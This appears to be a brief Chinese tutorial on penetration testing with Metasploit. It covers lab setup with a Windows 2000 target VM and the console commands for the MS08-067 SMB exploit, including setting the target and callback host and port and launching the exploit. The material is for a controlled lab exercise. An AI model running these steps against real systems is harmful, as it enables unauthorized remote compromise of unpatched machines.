1概念
Exploit:攻击者利用应用服务的安全漏洞进行的一次攻击。Exploit模块就是存在漏洞的模块。
payload:渗透之后希望被执行的代码
2实例演示
2.1实验环境准备
2.1.1 wmware station 10.0以上
下载地址:http://download.pchome.net/system/sysenhance/detail-4673.html
2.1.2 置虚拟机组成虚拟局域网
Windows 2000作为靶机系统
设置靶机和访问机在局域网段:192.168.1.0
2.1.3 metasploit 渗透工具下载
下载地址:http://www.metasploit.com/download/
2.2渗透过程
2.2.1 选择可利用模块
search windows/smb/ms08_067_netapi 或
show exploits;
use windows/smb/ms08_067_netapi.
2.2.2 选择在该模块下可以利用的payloads
(windows/smb/ms08_067_netapi) show payloads;
(windows/smb/ms08_067_netapi) set PAYLOAD ;
2.2.3 选择攻击目标
(windows/smb/ms08_067_netapi) Show targets
2.2.4 根据模块需要的参数进行设定参数
(windows/smb/ms08_067_netapi)show options
(windows/smb/ms08_067_netapi)set RHOST 192.168.1.2(靶机)
(windows/smb/ms08_067_netapi)set LHOST 192.168.1.3
(windows/smb/ms08_067_netapi)set LPORT 8080(任意)
2.2.5 进行攻击
(windows/smb/ms08_067_netapi)exploit
2.2.5 进行微调
实际工作注意问题:
启动较慢;
注意英文下才能输入;